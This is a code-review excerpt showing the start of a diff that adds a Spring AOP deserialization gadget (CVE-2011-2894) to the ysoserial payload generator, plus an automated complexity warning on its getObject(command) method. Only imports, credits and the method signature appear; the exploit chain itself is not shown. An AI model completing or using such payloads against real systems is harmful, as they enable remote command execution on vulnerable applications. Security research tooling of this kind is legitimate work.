src/main/java/ysoserial/payloads/SpringAop.java

```diff
@@ -0,0 +1,146 @@
+package ysoserial.payloads;
+
+import org.springframework.beans.factory.support.DefaultListableBeanFactory;
+import org.springframework.beans.factory.support.GenericBeanDefinition;
+import org.springframework.aop.target.SimpleBeanTargetSource;
+import org.springframework.aop.framework.AdvisedSupport;
+import org.springframework.aop.framework.DefaultAopProxyFactory;
+
+import java.io.NotSerializableException;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Proxy;
+
+import org.springframework.beans.factory.config.BeanDefinition;
+
+import java.util.Collections;
+
+import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
+
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.PrintUtil;
+import ysoserial.payloads.util.PayloadRunner;
+
+import javassist.*;
+import ysoserial.payloads.util.Reflections;
+
+import java.util.List;
+
+/**
+ * This is a gadget that work on an older version of Spring (compare to Spring1 gadget).
+ *
+ * The gadget was created Alvaro Muñoz (@pwntester) (CVE-2011-2894)
+ *
+ * http://www.pwntester.com/blog/2013/12/16/cve-2011-2894-deserialization-spring-rce/
+ */
+@SuppressWarnings({"restriction", "rawtypes"})
+@Dependencies({"org.springframework:spring-core:3.0.5.RELEASE","org.springframework:spring-beans:3.0.5.RELEASE","org.springframework:spring-aop:3.0.5.RELEASE"})
+public class SpringAop extends PayloadRunner implements ObjectPayload<Object> {
+
+    private static boolean DEBUG = false;
+
+    public Object getObject(final String command) throws Exception {
```

Comment:
![Codacy](https://www.codacy.com/versioned/images/favicon.png) Issue found: [The method getObject() has an NPath complexity of 2048](https://www.codacy.com/app/frohoff/ysoserial/file/2167879647/issues/source?bid=3161887&fileBranchId=3161888#l41)